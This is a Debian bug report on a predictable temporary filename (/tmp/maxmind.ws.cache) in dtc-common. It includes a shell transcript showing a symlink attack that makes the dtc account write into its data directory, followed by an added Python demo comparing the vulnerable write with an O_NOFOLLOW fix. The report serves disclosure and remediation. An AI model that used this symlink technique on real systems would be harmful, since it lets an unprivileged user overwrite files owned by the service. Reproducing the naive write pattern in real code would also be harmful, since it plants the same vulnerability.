Package: dtc-common
Severity: normal
Tags: upstream, security
If maxmind is enabled, it uses the predictable filename:
/tmp/maxmind.ws.cache
allowing a symlink to use the dtc privileges to overwrite a file:

nobody@testdtc:/$ whoami
nobody
nobody@testdtc:/$ ln -s /var/lib/dtc/etc/cband_scores/foo /tmp/maxmind.ws.cache
nobody@testdtc:/$ ls -l /var/lib/dtc/etc/cband_scores/foo
ls: cannot access /var/lib/dtc/etc/cband_scores/foo: No such file or directory

... then a new user registers...

nobody@testdtc:/$ ls -l /var/lib/dtc/etc/cband_scores/foo
-rw-r--r-- 1 dtc dtcgrp 38 Aug 13 01:17 /var/lib/dtc/etc/cband_scores/foo
nobody@testdtc:/$ cat /var/lib/dtc/etc/cband_scores/foo
208.43.124.50;74.86.25.131
1313212635

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (600, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
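
Added example, not part of the original report and not DTC's own code: a naive write to a fixed cache name beside a writer that refuses a symlinked path, run entirely inside a scratch directory. The function names, the shared/private directory layout and the sample data are assumptions made for the illustration.

```python
import os
import tempfile

def naive_write(path, data):
    # Pattern from the report: open a fixed, predictable name for writing.
    # open() follows a symlink in the last path component.
    with open(path, "w") as fh:
        fh.write(data)

def safe_write(path, data):
    # O_NOFOLLOW makes open() fail if the last path component is a symlink,
    # so a planted link cannot redirect the write.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)

def demo():
    # Everything happens in a scratch directory (constructed layout):
    # "shared" stands in for /tmp, "private" for a service-owned directory.
    with tempfile.TemporaryDirectory() as root:
        shared = os.path.join(root, "shared")
        private = os.path.join(root, "private")
        os.mkdir(shared)
        os.mkdir(private)
        cache = os.path.join(shared, "maxmind.ws.cache")
        target = os.path.join(private, "foo")
        os.symlink(target, cache)  # link planted before the cache is written

        naive_write(cache, "constructed sample data\n")
        naive_followed = os.path.isfile(target)  # file appeared via the link
        os.unlink(target)

        try:
            safe_write(cache, "constructed sample data\n")
            refused = False
        except OSError:
            refused = True
        target_untouched = not os.path.exists(target)

        os.unlink(cache)  # with the link gone, the hardened writer works
        safe_write(cache, "constructed sample data\n")
        mode = os.stat(cache).st_mode & 0o777
    return naive_followed, refused, target_untouched, mode

if __name__ == "__main__":
    print(demo())
```

O_NOFOLLOW only guards the final path component; keeping the cache in a directory writable only by the service account avoids the shared-directory problem altogether.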

